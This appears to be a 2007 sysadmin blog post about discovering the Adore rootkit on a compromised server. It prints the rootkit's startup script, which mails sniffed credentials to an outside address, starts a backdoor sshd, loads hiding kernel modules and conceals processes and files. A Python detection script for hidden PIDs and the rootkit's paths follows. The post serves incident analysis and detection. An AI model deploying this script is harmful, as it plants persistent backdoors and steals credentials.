Adore Rootkit by darkorc3
Monday, November 5th, 2007

A few days ago I discovered that a virtual machine on my OpenVZ server was compromised. The server was exploited and the Adore Rootkit was installed. It emailed data to darkorc3@yahoo.com on startup. The following script was installed on every run level in rc.d:
    #!/bin/sh
    # rootkit working directory (hidden below with "ava h .")
    cd /usr/bin/.tmp
    # process the sniffer's log and mail the harvested data ("conturi") to the attacker
    ./vad tcp.log >conturi.log
    cat /usr/bin/.tmp/conturi.log|mail -s "back" darkorc3@yahoo.com
    rm -rf /usr/bin/.tmp/tcp.log
    # start the attacker's own sshd (with its own config) and a second daemon
    ./sshd -f sshd_config
    ./httpd &
    # load the Adore LKM, then the cleaner module that removes it from the module list
    /sbin/insmod -f adore.o > /dev/null 2>&1
    /sbin/insmod -f cleaner.o > /dev/null 2>&1
    /sbin/rmmod cleaner > /dev/null 2>&1
    # ava i: make the backdoor and sniffer processes invisible
    ./ava i `cat pid` > /dev/null 2>&1
    ./ava i `cat sniff.pid` > /dev/null 2>&1
    # ava h: hide the directory, the init links and /proc/ksyms
    ./ava h . > /dev/null 2>&1
    for i in {2,3,4,5}
    do
        ./ava h /etc/rc.d/rc$i.d/S96daemon > /dev/null 2>&1
    done
    ./ava h /proc/ksyms > /dev/null 2>&1
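An added check, not from the original post, in the style of chkrootkit's chkproc: an LKM that filters /proc directory listings can still leave hidden PIDs reachable by direct probing, so brute-forcing the PID range and diffing against readdir exposes them. It also looks for the on-disk paths named in the script above. The PID probe and path list are taken from the post; the cutoff behaviour on other rootkits is an assumption.

```python
import os

# Paths copied from the startup script in the post; presence of any is an indicator.
ADORE_PATHS = [
    "/usr/bin/.tmp",
    "/usr/bin/.tmp/adore.o",
    "/usr/bin/.tmp/cleaner.o",
    "/usr/bin/.tmp/ava",
] + [f"/etc/rc.d/rc{i}.d/S96daemon" for i in range(2, 6)]


def find_hidden_pids(visible, exists, max_pid=32768):
    """Return PIDs that answer a direct probe but are absent from the listing.

    visible: set of PIDs obtained by reading /proc (what the rootkit lets you see).
    exists:  callable(pid) -> bool that checks the PID without a directory listing.
    """
    return [pid for pid in range(1, max_pid + 1)
            if pid not in visible and exists(pid)]


def check_paths(paths, exists):
    """Return the indicator paths that exist according to the given predicate."""
    return [p for p in paths if exists(p)]


def proc_listing():
    """PIDs as seen through readdir(/proc); this is what getdents hooks filter."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def proc_probe(pid):
    """Probe a PID without readdir: stat /proc/<pid> and kill(pid, 0)."""
    if os.path.isdir(f"/proc/{pid}"):
        return True
    try:
        os.kill(pid, 0)
        return True
    except ProcessLookupError:
        return False
    except PermissionError:   # exists, but belongs to another user
        return True


def scan_live():
    """Run both checks on the local host (Linux only)."""
    try:
        with open("/proc/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    except OSError:
        pid_max = 32768
    return {"hidden_pids": find_hidden_pids(proc_listing(), proc_probe, pid_max),
            "indicator_paths": check_paths(ADORE_PATHS, os.path.exists)}
```

Run scan_live() as root; hidden PIDs that vanish on a second pass are usually just short-lived processes, a stable one is worth a closer look.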
In my few years as a Linux system administrator, this is the smartest, most potentially harmful, and most elegant exploit I have come across. If you have or need any more information, please let me know.
